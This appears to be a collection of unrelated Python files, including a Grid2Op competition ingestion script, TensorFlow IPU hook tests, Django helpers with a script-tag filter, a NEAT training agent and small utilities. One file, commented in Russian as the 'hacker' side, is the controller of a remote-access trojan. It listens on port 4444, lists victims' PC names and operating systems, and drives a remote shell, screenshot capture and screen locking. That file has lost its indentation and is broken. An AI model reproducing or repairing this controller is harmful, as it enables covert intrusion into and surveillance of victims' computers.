        raise RuntimeError(MAKE_AGENT_ERR) from None
    # Optional: the submission may ship its own training reward class.
    try:
        from submission import reward
    except Exception:  # narrowed from a bare except
        print(INFO_CUSTOM_REWARD)
        reward = RedispReward
    if not isinstance(reward, type):
        raise RuntimeError(REWARD_ERR)
    if not issubclass(reward, BaseReward):
        raise RuntimeError(REWARD_ERR2)
    # Optional: the submission may ship extra "other_rewards".
    try:
        from submission import other_rewards
    except Exception:  # narrowed from a bare except
        print(INFO_CUSTOM_OTHER)
        other_rewards = {}
    if args.key_score in other_rewards:
        # BUG FIX: this previously referenced the undefined name
        # KEY_OVERLOAD_WARN and died with a NameError; the module-level
        # template is actually called KEY_OVERLOAD_REWARD.
        print(KEY_OVERLOAD_REWARD.format(args.key_score))
    # The competition score always owns this key, as stated in the rules.
    other_rewards[args.key_score] = L2RPNSandBoxScore
    # Loop over env dirs
    for env_dir in os.listdir(input_dir):
        env_path = os.path.join(input_dir, env_dir)
        if not os.path.isdir(env_path):
            continue
        # Template environment: used only to build the agent, never stepped.
        try:
            with warnings.catch_warnings():
                warnings.filterwarnings("ignore")
                env_template = grid2op.make(env_path,
                                            chronics_class=ChangeNothing,
                                            action_class=TopologyAndDispatchAction)
        except Exception as e:
            raise RuntimeError(ENV_TEMPLATE_ERR) from e
        try:
            submitted_agent = make_agent(env_template, submission_location)
        except Exception as e:
            raise RuntimeError(MAKE_AGENT_ERR2) from e
        if not isinstance(submitted_agent, BaseAgent):
            raise RuntimeError(BASEAGENT_ERR)
        # Prefer the fast lightsim2grid backend when it is installed.
        try:
            from lightsim2grid.LightSimBackend import LightSimBackend
            backend = LightSimBackend()
        except Exception:  # narrowed from a bare except
            print(BACKEND_WARN)
            from grid2op.Backend import PandaPowerBackend
            backend = PandaPowerBackend()
        real_env = grid2op.make(env_path,
                                backend=backend,
                                reward_class=reward,
                                other_rewards=other_rewards)
        runner = Runner(**real_env.get_params_for_runner(),
                        agentClass=None, agentInstance=submitted_agent)
        path_save = os.path.abspath(os.path.join(output_dir, env_dir))
        runner.run(nb_episode=args.nb_episode,
                   path_save=path_save,
                   max_iter=-1,
                   env_seeds=env_seeds,
                   agent_seeds=agent_seeds)
        print(INFO_ENV_INGESTION_OK.format(env_dir, path_save))
        real_env.close()
        env_template.close()
    # Generate a gif if enabled
    if args.gif_env is not None and args.gif_episode is not None:
        gif_input = os.path.join(output_dir, args.gif_env)
        write_gif(output_dir, gif_input, args.gif_episode,
                  args.gif_start, args.gif_end)
    if args.cleanup:
        # Strip bulky per-step artifacts from the runner logs.
        cmds = [
            "find {} -name '*.npz' | xargs -i rm -rf {}",
            "find {} -name 'dict_*.json' | xargs -i rm -rf {}",
            "find {} -name '_parameters.json' | xargs -i rm -rf {}"
        ]
        for cmd in cmds:
            os.system(cmd.format(output_dir, "{}"))
if __name__ == "__main__":
    import traceback
    # Catch any failure, dump a framed traceback to stdout (so Codalab
    # captures it in the ingestion log), and exit non-zero.
    try:
        main()
    except Exception as e:
        print("------------------------------------")
        print("         Detailed error Logs          ")
        print("------------------------------------")
        traceback.print_exc(file=sys.stdout)
        print("------------------------------------")
        print("        End Detailed error Logs       ")
        print("------------------------------------")
        sys.exit(1)
|
#!/usr/bin/python3
#
import random
import string
def getRndStr(length):
    """Return a random string of *length* lowercase ASCII letters."""
    alphabet = string.ascii_lowercase
    return ''.join(random.choice(alphabet) for _ in range(length))

# Demo: print two independent 5-character random strings.
print(getRndStr(5))
print(getRndStr(5))
|
# The analysis file that is created by the get_probs_at_frame file stores information for the files. This reads
# that information and allows for creating more concise meaningful stats.
import ast
import numpy as np
# Parse the analysis file and aggregate (start_frame, length) attempt pairs
# for lines belonging to the "SS00090" dataset.
with open("analysis-dec-16-ss90-96-98.txt", "r") as f:
    frame_start_attempts = []
    frame_attempts_lengths = []
    count = 0
    num_attempts = 0
    for line in f.readlines():
        # print(line)
        # First whitespace-separated token is the record name.
        items = line.split(" ")
        name = items[0]
        if("SS00090" in name):
            count += 1
            # Slice from one char before '[' through ']' then strip; the
            # payload is a literal Python list of (start, length) pairs.
            # NOTE(review): raises ValueError if a matching line has no
            # bracketed list — assumed not to occur in this file; confirm.
            data = line[line.index("[")-1:line.index("]")+1].strip()
            print(data)
            if(len(data) > 2):
                # Non-empty list: record each attempt's start frame/length.
                for x in ast.literal_eval(data):
                    frame_start_attempts.append(x[0])
                    frame_attempts_lengths.append(x[1])
                    num_attempts += 1
            else:
                # Empty list "[]" still counts as one attempt.
                num_attempts += 1
# Summary statistics over all collected attempts.
print(frame_start_attempts)
print(frame_attempts_lengths)
print(np.mean(frame_start_attempts))
print(np.std(frame_start_attempts))
print(np.mean(frame_attempts_lengths))
print(np.std(frame_attempts_lengths))
print("avg attempts per frame: " + str(num_attempts/count))
print("count: " + str(count))
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ipu import ipu_compiler
from tensorflow.python.ipu import loops
from tensorflow.python.ipu.ipu_session_run_hooks import IPULoggingTensorHook
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
@test_util.deprecated_graph_mode_only
class IPULoggingTensorHookTest(test_util.TensorFlowTestCase):
  """Unit tests for IPULoggingTensorHook: argument validation, log-call
  contract, output formatting, logging modes and trigger schedules
  (at_end / every_n_iter / every_n_secs)."""

  # Replaces tf_logging.info so tests can inspect what was logged.
  def mock_log(self, *args, **kwargs):
    del kwargs
    self.logged_message = args
  def test_illegal_args(self):
    with self.assertRaisesRegex(
        ValueError, "Cannot provide both every_n_iter and every_n_secs"):
      IPULoggingTensorHook(every_n_iter=5, every_n_secs=5)
    with self.assertRaisesRegex(
        ValueError,
        "Either every_n_iter, every_n_secs or at_end should be provided"):
      IPULoggingTensorHook()
  def test_illegal_log_types(self):
    hook = IPULoggingTensorHook(at_end=True)
    with self.assertRaisesRegex(TypeError, "Expected `tf.Tensor`"):
      hook.log("foo")
    with self.assertRaisesRegex(TypeError, "Expected `tf.Tensor`"):
      hook.log([1.0])
  def test_missing_log_call(self):
    hook = IPULoggingTensorHook(at_end=True)
    with self.assertRaisesRegex(RuntimeError,
                                "Did you forget to call the log function"):
      hook.begin()
  def test_log_twice_not_supported(self):
    hook = IPULoggingTensorHook(at_end=True)
    with ipu_scope("/device:IPU:0"):
      t = constant_op.constant(0.0)
      hook.log(t)
      with self.assertRaisesRegex(
          RuntimeError,
          "Cannot use this hook object's log function more than once"):
        return hook.log(t)
  def test_print_tensor(self):
    hook = IPULoggingTensorHook(at_end=True)
    def model():
      t = constant_op.constant(42.0, name="foo")
      return hook.log(t)
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        mon_sess.run(compiled_model)
    self.assertRegex(str(self.logged_message), "foo:0 = 42.0")
  def test_print_list(self):
    hook = IPULoggingTensorHook(at_end=True)
    def model():
      t1 = constant_op.constant(42.0, name="foo")
      t2 = constant_op.constant(43.0, name="bar")
      return hook.log([t1, t2])
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        mon_sess.run(compiled_model)
    self.assertRegex(str(self.logged_message), "foo:0 = 42.0, bar:0 = 43.0")
  def test_print_dict(self):
    hook = IPULoggingTensorHook(at_end=True)
    def model():
      t1 = constant_op.constant(42.0)
      t2 = constant_op.constant(43.0)
      return hook.log({"foo": t1, "bar": t2})
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        mon_sess.run(compiled_model)
    self.assertRegex(str(self.logged_message), "foo = 42.0, bar = 43.0")
  # A user-supplied formatter receives the {name: value} dict.
  def test_print_formatter(self):
    def formatter(args):
      self.assertIsInstance(args, dict)
      return "foobar: {}".format(args)
    hook = IPULoggingTensorHook(at_end=True, formatter=formatter)
    def model():
      t1 = constant_op.constant(42.0, name="foo")
      t2 = constant_op.constant(43.0, name="bar")
      return hook.log([t1, t2])
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        mon_sess.run(compiled_model)
    self.assertRegex(str(self.logged_message),
                     r"foobar: \{'foo:0': 42.0, 'bar:0': 43.0\}")
  def test_print_at_end_only(self):
    hook = IPULoggingTensorHook(at_end=True)
    def model():
      t = constant_op.constant(42.0, name="foo")
      return hook.log(t)
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        self.logged_message = ""
        for _ in range(3):
          mon_sess.run(compiled_model)
          # Nothing may be logged while the session is still running.
          self.assertEqual(str(self.logged_message).find("foo"), -1)
    self.assertRegex(str(self.logged_message), "foo:0 = 42.0")
  # LoggingMode.ALL accumulates every logged value between triggers.
  def test_print_all_at_end(self):
    hook = IPULoggingTensorHook(
        at_end=True, logging_mode=IPULoggingTensorHook.LoggingMode.ALL)
    def body(v):
      logging_op = hook.log({"foo": v})
      with ops.control_dependencies([logging_op]):
        return v + 1
    def model():
      return loops.repeat(2, body, inputs=[1.0])
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        for _ in range(2):
          mon_sess.run(compiled_model)
    self.assertRegex(str(self.logged_message), r"foo = \[1. 2. 1. 2.\]")
  def test_print_every_n_iter(self):
    hook = IPULoggingTensorHook(every_n_iter=2)
    def model():
      step = variables.Variable(0)
      return hook.log({"step": step.assign_add(1).value()})
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      # Test re-using the hook.
      for _ in range(2):
        with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
          mon_sess.run(compiled_model)
          self.assertRegex(str(self.logged_message), "step = 1")
          self.logged_message = ""
          mon_sess.run(compiled_model)
          # Second run falls between triggers: nothing logged.
          self.assertEqual(self.logged_message, "")
          mon_sess.run(compiled_model)
          self.assertRegex(str(self.logged_message), "step = 3")
  # time.time is mocked so the 0.5 s trigger can be tested deterministically.
  @test.mock.patch.object(time, "time")
  def test_print_every_n_secs(self, mock_time):
    hook = IPULoggingTensorHook(every_n_secs=0.5)
    def model():
      return hook.log({"log": constant_op.constant(0)})
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    with test.mock.patch.object(tf_logging, "info", self.mock_log):
      with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
        mock_time.return_value = 1.0
        mon_sess.run(compiled_model)
        self.assertRegex(str(self.logged_message), "log = 0")
        self.logged_message = ""
        mock_time.return_value = 1.49
        mon_sess.run(compiled_model)
        self.assertEqual(self.logged_message, "")
        mock_time.return_value = 1.5
        mon_sess.run(compiled_model)
        self.assertRegex(str(self.logged_message), "log = 0")
  # Two independent hooks with different schedules must not interfere.
  def test_two_hooks(self):
    hook1 = IPULoggingTensorHook(every_n_iter=1)
    hook2 = IPULoggingTensorHook(
        every_n_iter=2, logging_mode=IPULoggingTensorHook.LoggingMode.ALL)
    def model():
      step = variables.Variable(0)
      updated = step.assign_add(1).value()
      return hook1.log({"hook1": updated}), hook2.log({"hook2": updated})
    with ipu_scope("/device:IPU:0"):
      compiled_model = ipu_compiler.compile(model)
    logged_messages = []
    def mock_log(*args, **kwargs):
      del kwargs
      logged_messages.append(str(args))
    with MonitoredTrainingSession(hooks=[hook1, hook2]) as mon_sess:
      with test.mock.patch.object(tf_logging, "info", mock_log):
        mon_sess.run(compiled_model)
        self.assertEqual(len(logged_messages), 2)
        self.assertRegex(logged_messages[0], "hook1 = 1")
        self.assertRegex(logged_messages[1], r"hook2 = \[1\]")
        mon_sess.run(compiled_model)
        self.assertEqual(len(logged_messages), 3)
        self.assertRegex(logged_messages[2], "hook1 = 2")
        mon_sess.run(compiled_model)
        self.assertEqual(len(logged_messages), 5)
        self.assertRegex(logged_messages[3], "hook1 = 3")
        self.assertRegex(logged_messages[4], r"hook2 = \[2 3\]")
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  test.main()
|
#! /usr/bin/python3
from sys import argv
# Render lines of digit characters from stdin as an ASCII grid of cells.
# Board width in cells: first CLI argument, defaulting to 16.
w = int( argv[1] ) if len( argv ) == 2 else 16
# Per-cell fragments selected by bits of each input digit:
#   h: bottom-border fragments (bit 0 of the digit),
#   v: cell-face fragments (bits 1-2 of the digit).
# NOTE(review): exact encoding of the digits is inferred from the bit masks
# below — confirm against whatever produces this script's input.
h = ( ' +', '--+' )
v = ( ' ', ' |', 'OO ', 'OO|' )
# Top border of the grid.
print( '+' + '--+' * w )
while True:
    try:
        line=input()
    except EOFError:
        break
    # One input line -> two output lines: the cell faces, then the borders.
    print( '|', *[ v[int( c ) >> 1 & 3] for c in line ], sep='' )
    print( '+', *[ h[int( c ) & 1] for c in line ], sep='' )
|
import os
import re
from django.conf import settings
def validation_error(parameter, value=None, field=None):
    """Build a standard 406 validation-error payload.

    parameter: name of the invalid parameter (used in the message).
    value: optional offending value, appended to the message.
    field: optional explicit field name for the 'field' key; falls back to
        *parameter* when omitted.

    Fix: the ``field`` argument was previously accepted but ignored — the
    returned dict always echoed ``parameter``.  Callers that never passed
    ``field`` see identical output.
    """
    msg = 'Invalid "%s" value' % (parameter,)
    if value is not None:
        msg += '("%s")' % (value,)
    return {'error': msg,
            'error_code': 406,
            'field': field if field is not None else parameter}
def validate_regexp(key, value):
    """Match *value* against the pattern configured as settings.REGEXP[key].

    Returns the re.Match object (truthy) on success, else None.
    """
    pattern = settings.REGEXP[key]
    return re.match(pattern, value)
# Pre-compiled, case-insensitive pattern matching a whole <script>...</script>
# element (tolerates '<' inside the body as long as it doesn't close the tag).
_script_pattern = re.compile(
    r'<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>',
    flags=re.IGNORECASE)

def remove_script(input_str):
    """Replace every <script> element in *input_str* with '[filtered]'.

    Falsy inputs (None, empty string) are returned unchanged.
    """
    if not input_str:
        return input_str
    return _script_pattern.sub('[filtered]', input_str)
# 455. Assign Cookies
# https://leetcode.com/problems/assign-cookies/description/
class Solution:
    def findContentChildren(self, g, s):
        """Greedy cookie assignment: sort both lists (in place, matching the
        original's side effect), then walk them with two cursors, giving the
        smallest cookie that satisfies the currently least-greedy child.

        :type g: List[int]  greed factor of each child
        :type s: List[int]  size of each cookie
        :rtype: int         number of content children
        """
        g.sort()
        s.sort()
        child = cookie = 0
        while child < len(g) and cookie < len(s):
            if g[child] <= s[cookie]:
                child += 1
            cookie += 1
        return child
|
from django import forms
from rbmo.models import AllotmentReleases
from django.contrib.auth.models import User
class AllotmentReleaseForm(forms.Form):
    """Form for recording an allotment release (ADA number, month, amount).

    All widgets carry the Bootstrap 'form-control' class.
    """
    # (value, label) choices for the month selector.
    MONTHS = ((1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'),
              (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'),
              (10, 'October'), (11, 'November'), (12, 'December'))
    ada = forms.IntegerField(widget=forms.NumberInput(attrs={
        'class' : 'form-control',
        'required' : 'True'
    }))
    month = forms.ChoiceField(choices=MONTHS,
                              widget=forms.Select(attrs={
                                  'class': 'form-control'
                              }
                              ))
    amount = forms.DecimalField(widget=forms.NumberInput(
        attrs={'class': 'form-control',
               'required': 'True'
               }
    ))
    # NOTE(review): Meta has no effect on a plain forms.Form — model/fields
    # are honoured only by forms.ModelForm.  Also 'amount_release' does not
    # match the form field named 'amount'.  Confirm whether this should be
    # a ModelForm over AllotmentReleases.
    class Meta:
        model = AllotmentReleases
        fields = ['ada', 'month', 'amount_release']
|
# Generated by Django 3.1.5 on 2021-01-27 23:11
import core.models
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
    # Initial migration for the app: creates the Projects model.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Projects',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100, verbose_name='name')),
                ('description', models.CharField(max_length=256, verbose_name='description')),
                # Upload path is computed by core.models.get_file_path.
                ('img', stdimage.models.StdImageField(upload_to=core.models.get_file_path, verbose_name='Image')),
            ],
            options={
                # NOTE(review): singular/plural look swapped ('Projects' vs
                # 'project') — do not edit an applied migration; fix in the
                # model and generate a new migration if intended.
                'verbose_name': 'Projects',
                'verbose_name_plural': 'project',
            },
        ),
    ]
|
import numpy as np
import gym
import math
import os
import pickle
import neat
from neat.reporting import *
import time
import torch.multiprocessing as mp
from utils import *
from config import *
class GenomeEvaluator:
    """Rolls out NEAT genomes in a fresh environment instance and reports
    (mean fitness over repetitions, total environment steps)."""

    def __init__(self, config, neat_config, state_normalizer):
        self.config = config
        self.neat_config = neat_config
        self.state_normalizer = state_normalizer
        self.env = config.env_fn()
        self.repetitions = config.repetitions

    def eval_genome(self, genome):
        """Evaluate one genome over ``self.repetitions`` episodes."""
        net = neat.nn.FeedForwardNetwork.create(genome, self.neat_config)
        scores = np.zeros(self.repetitions)
        lengths = np.zeros(self.repetitions)
        for rep in range(self.repetitions):
            scores[rep], lengths[rep] = self.evaluate(net)
        return scores.mean(), lengths.sum()

    def evaluate(self, net):
        """Run a single episode; return (fitness, step count)."""
        obs = self.state_normalizer(self.env.reset())
        total_reward = 0
        step_count = 0
        done = False
        while not done:
            raw_action = net.activate(obs)
            obs, reward, done, _ = self.env.step(self.config.action_clip(raw_action))
            obs = self.state_normalizer(obs)
            total_reward += reward
            step_count += 1
        return self.config.reward_to_fitness(total_reward), step_count
class Worker(mp.Process):
    """Child process that pulls (id, genome) tasks from a queue, evaluates
    them with a GenomeEvaluator, and pushes [id, fitness, steps] results."""
    def __init__(self, id, state_normalizer, task_q, result_q, stop, config, neat_config):
        mp.Process.__init__(self)
        self.id = id
        self.task_q = task_q           # incoming (id, genome) pairs
        self.result_q = result_q       # outgoing [id, fitness, steps]
        self.state_normalizer = state_normalizer
        self.stop = stop               # shared flag that ends the loop
        self.config = config
        self.env = config.env_fn()
        self.evaluator = GenomeEvaluator(config, neat_config, state_normalizer)
    def run(self):
        # Re-seed so forked workers don't share the parent's RNG stream.
        np.random.seed()
        # NOTE(review): busy-wait polling — empty() + continue spins the CPU
        # while idle; a blocking get() would be gentler. Behavior kept as-is.
        while not self.stop.value:
            if self.task_q.empty():
                continue
            id, genome = self.task_q.get()
            fitness, steps = self.evaluator.eval_genome(genome)
            self.result_q.put([id, fitness, steps])
class NEATAgent:
    """Drives a NEAT population: farms genome evaluation out to Worker
    processes, keeps state-normalisation statistics in sync across workers,
    and tracks (fitness, steps, wall-clock) history via a custom reporter."""
    def __init__(self, config):
        self.config = config
        self.neat_config = self.load_neat_config()
        self.neat_config.pop_size = config.pop_size
        # Task/result queues shared with the worker processes.
        self.task_q = mp.SimpleQueue()
        self.result_q = mp.SimpleQueue()
        self.total_steps = 0
        stop = mp.Value('i', False)
        stats = SharedStats(config.state_dim)
        # One normalizer per worker, all seeded from the same shared stats.
        normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
        for normalizer in normalizers:
            normalizer.offline_stats.load(stats)
        workers = [Worker(id, normalizers[id], self.task_q, self.result_q, stop,
                          config, self.neat_config) for id in range(config.num_workers)]
        for w in workers: w.start()
        self.normalizers = normalizers
        self.stats = stats
        self.stop = stop
    def load_neat_config(self):
        """Read neat-config/<task>.txt and set its fitness threshold."""
        local_dir = os.path.dirname(__file__)
        config_path = os.path.join(local_dir, 'neat-config/%s.txt' % self.config.task)
        neat_config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
                                  neat.DefaultSpeciesSet, neat.DefaultStagnation,
                                  config_path)
        neat_config.fitness_threshold = self.config.target
        return neat_config
    def evaluate(self, genomes, _):
        """NEAT fitness function: dispatch all genomes to the workers and
        collect their fitnesses; then fold the workers' online normalisation
        stats back into the shared offline stats."""
        tasks = [genome for _, genome in genomes]
        for id, task in enumerate(tasks):
            self.task_q.put([id, task])
        steps = 0
        results = []
        # Busy-wait until every genome has been scored.
        while len(results) < len(tasks):
            if self.result_q.empty():
                continue
            id, fitness, step = self.result_q.get()
            steps += step
            tasks[id].fitness = fitness
            results.append([id, fitness])
        for normalizer in self.normalizers:
            self.stats.merge(normalizer.online_stats)
            normalizer.online_stats.zero()
        for normalizer in self.normalizers:
            normalizer.offline_stats.load(self.stats)
        self.total_steps += steps
    def test(self, genome):
        """Score one genome with a fresh evaluator (test_repetitions runs)."""
        normalizer = StaticNormalizer(self.config.state_dim)
        normalizer.offline_stats.load(self.stats)
        evaluator = GenomeEvaluator(self.config, self.neat_config, normalizer)
        evaluator.repetitions = self.config.test_repetitions
        return evaluator.eval_genome(genome)
    def evolve(self):
        """Run NEAT until max_steps is exceeded; return [fitness, steps,
        timestamps] histories recorded by the reporter."""
        class CustomReporter(BaseReporter):
            def __init__(self, agent):
                self.fitness = []
                self.steps = []
                self.timestamps = []
                self.agent = agent
                self.initial_time = time.time()
            def post_evaluate(self, config, population, species, best_genome):
                elapsed_time = time.time() - self.initial_time
                self.steps.append(self.agent.total_steps)
                self.timestamps.append(elapsed_time)
                reward, _ = self.agent.test(best_genome)
                self.fitness.append(reward)
                # self.fitness.append(best_genome.fitness)
                logger.info('total steps %d, test %f, best %f, elapsed time %f' %
                            (self.agent.total_steps, reward, best_genome.fitness, elapsed_time))
                # if best_genome.fitness > self.agent.config.target:
                #     self.agent.stop.value = True
                if self.agent.config.max_steps and self.agent.total_steps > self.agent.config.max_steps:
                    self.agent.stop.value = True
                    self.stats = [self.fitness, self.steps, self.timestamps]
                    # Pushing fitness past the threshold makes pop.run()
                    # terminate once the step budget is exhausted.
                    best_genome.fitness = self.agent.config.target + 1
        pop = neat.Population(self.neat_config)
        # stats = neat.StatisticsReporter()
        # pop.add_reporter(stats)
        # pop.add_reporter(neat.StdOutReporter(True))
        reporter = CustomReporter(self)
        pop.add_reporter(reporter)
        pop.run(self.evaluate)
        return reporter.stats
    def run(self):
        return self.evolve()
def multi_runs(config):
    """Run NEAT ten times on *config*'s task and pickle the per-run stats."""
    file_handler = logging.FileHandler('log/NEAT-%s.txt' % config.task)
    file_handler.setLevel(logging.DEBUG)
    logger.addHandler(file_handler)
    num_runs = 10
    all_stats = []
    for run_index in range(num_runs):
        logger.info('Run %d' % (run_index))
        agent = NEATAgent(config)
        all_stats.append(agent.run())
    # Persist the collected [fitness, steps, timestamps] lists for later plotting.
    with open('data/NEAT-stats-%s.bin' % (config.task), 'wb') as out_file:
        pickle.dump(all_stats, out_file)
def all_tasks():
    """Launch one multi-run NEAT experiment per benchmark task, each in its own process."""
    configs = []
    config = PendulumConfig()
    # presumably rescales the policy output to the env's action range — TODO confirm
    config.action_clip = lambda a: [2 * a[0]]
    config.max_steps = int(4e7)
    configs.append(config)
    config = BipedalWalkerConfig()
    config.max_steps = int(2e8)
    configs.append(config)
    config = ContinuousLunarLanderConfig()
    config.max_steps = int(4e7)
    configs.append(config)
    ps = []
    for cf in configs:
        # cf.max_steps = int(1e10)
        # Shared settings applied uniformly across tasks.
        cf.num_workers = 8
        cf.pop_size = 64
        ps.append(mp.Process(target=multi_runs, args=(cf, )))
    for p in ps: p.start()
    for p in ps: p.join()
if __name__ == '__main__':
    # Run every benchmark task's experiment suite.
    all_tasks()
|
import socket, os, time, threading, sys
from queue import Queue
# Хакер
intThreads = 2
arrJobs = [1,2]
queue = Queue()
arrAddresses = []
arrConnections = []
strHost = '192.168.1.150' #ip хакера
intPort = 4444
intBuff = 1024
decode_utf = lambda data: data.decode("utf-8")
remove_quotes = lambda string: string.replace("\"","")
center = lambda string, title: f"{{:^{len(string)}}}".format(title)
send = lambda data: conn.send(data)
recv = lambda buffer: conn.recv(buffer)
def recvall(buffer):
byData = b""
while True:
bytPart = recv(buffer)
if len(bytPart) == buffer:
return bytPart
byData += bytPart
if len(byData) == buffer:
return byData
def create_socket():
global objSocket
try:
objSocket = socket.socket()
objSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error() as strError:
print("Error creating socket" + str(strError))
def socket_bind():
global objSocket
try:
print("Listening on port:" + str(intPort))
objSocket.bind((strHost,intPort))
objSocket.listen(20)
except socket.error() as strError:
print("Error binding socket" +str(strError))
socket_bind()
def socket_accept():
while True:
try:
conn, address = objSocket.accept()
conn.setblocking(1)
arrConnections.append(conn)
client_info = decode_utf(conn.recv(intBuff)).split("',")
address += client_info[0], client_info[1], client_info[2]
arrAddresses.append(address)
print("\n"+ "Connection has been established : {0} ({1})".format(address[0],address[2]))
except socket.error:
print("Error acceptting connections")
continue
def menu_help():
print("\n"+"--help")
print("--l system (система)")
print("--x exit (выход)")
print("--m [text] (сообщение на экран")
print("--i 0")
print("--p (скрин экрана")
print("--x 1 (заблокировать экран)")
print("--e")
def main_menu():
while True:
strChoice =input("\n"+"~#")
if strChoice == "--l":
list_connections()
elif strChoice[:3] == "--i" and len(strChoice) > 3:
conn = select_connection(strChoice[4:], "True")
if conn is not None:
send_command()
elif strChoice == "--p":
screenshot()
elif strChoice =="--x":
close()
break
else:
print('invalid choice')
menu_help()
def close():
global arrConnections, arrAddresses
if len(arrAddresses) ==0:
return
for intCounter, conn in enumerate(arrConnections):
conn.send(str.encode("exit"))
conn.close()
del arrConnections; arrConnections = []
del arrAddresses; arrAddresses = []
def list_connections():
if len(arrConnections) > 0:
strClients = ""
for intCounter, conn in enumerate(arrConnections):
strClients += str(intCounter) + 4*" " + str(arrAddresses[intCounter][0]) + 4*" " + \
str(arrAddresses[intCounter][1]) + 4*" "+ str(arrAddresses[intCounter][2])+ 4*" "+ \
str(arrAddresses[intCounter][3]) + "\n"
print("\n"+ "ID"+ 3*" "+center(str(arrAddresses[0][0])), "IP" ) + 4*" "+
center(str(arrAddresses[0][1]), "Port") + 4*" "+
center(str(arrAddresses[0][2]), "PC Name") + 4*" " +
center(str(arrAddresses[0][3]), "OS") + "\n" +strClients, end= ""
else:
print("No connections(нет соединения)")
def select_connection(connection_id, blnGetResponse):
global conn, arrInfo
try:
connection_id = int(connection_id)
conn = arrConnections[connection_id]
except:
print("invalid choice")
return
else:
arrInfo = str(arrAddresses[connection_id][0]),str(arrAddresses[connection_id][2]), \
str(arrAddresses[connection_id][3]), \
str(arrAddresses[connection_id][4])
if blnGetResponse == "True":
print("You are connected to" + arrInfo[0] + "......." + "\n")
return conn
def send_commands():
while True:
strChoice = input("\n" + "Type Selection")
if strChoice[:3] == "--m" and len(strChoice) > 3:
strMsg = "msg" + strChoice[4:]
send(str.encode(strMsg))
elif strChoice[:3] == "--o" and len(strChoice) > 3:
strSite = "site" + strChoice[4:]
send(str.encode(strSite))
elif strChoice == "--p":
screenshot()
elif strChoice == "--x 1":
send(str.encode("lock"))
elif strChoice == "--e":
command_shell()
def command_shell():
send(str.encode("cmd"))
strDefault = "\n"+ decode_utf(recv(intBuff)) + ">"
print(strDefault, end= "")
while True:
strCommand = input()
if strCommand == "quit" or strCommand == "exit":
send(str.encode("goback"))
elif strCommand == "cmd":
print("Please do not use this command..")
elif len(str(strCommand)) > 0:
send(str.encode(strCommand))
intBuff = int(decode_utf(recv(intBuff)))
strClientResponse = decode_utf(recvall(intBuffer))
print(strClientResponse, end="")
else:
print(strDefault, end="")
def screenshot():
send(str.encode("screen"))
strClientResponse = decode_utf(recv(intBuff))
print("\n" + strClientResponse)
intBuffer = ''
for intCounter in range(0,len(strClientResponse)):
if strClientResponse[intCounter].isdigit():
intBuffer += strClientResponse[intCounter]
intBuffer = int(intBuffer)
strFile = time.strftime("%Y%m%d%H%M%S" + ".png")
ScrnData = recvall(intBuffer)
objPic = open(strFile, "wb")
objPic.write(ScrnData); objPic.close()
print("Done" + "\n" + "Total bytes recevied:" + os.path.getsize(strFile)) + "bytes"
def create_threads():
for _ in range(intThreads):
objThread =threading.Thread(target=work)
objThread.daemon = True
objThread.start()
queue.join()
def work():
while True:
intValue = queue.get()
if intValue == 1:
create_socket()
socket_bind()
socket_accept()
elif intValue == 2:
while True:
time.sleep(0.2)
if len(arrAddresses) > 0:
break
queue.task_done()
queue.task_done()
sys.exit(0)
def create_jobs():
for intThreads in arrJobs:
queue.put(intThreads)
queue.join()
create_threads()
create_jobs()
|
# O(v+e) time | o(v) space
class Node:
    """Node in a directed graph/tree, identified by *name*."""

    def __init__(self, name):
        self.children = []
        self.name = name
        # Retained for backward compatibility with existing attribute access;
        # traversal no longer stores state here (instance-level state made a
        # second breadthFirstSearch call return an empty result).
        self.visited = set()

    def addChild(self, name):
        """Append a new child node and return self, allowing call chaining."""
        self.children.append(Node(name))
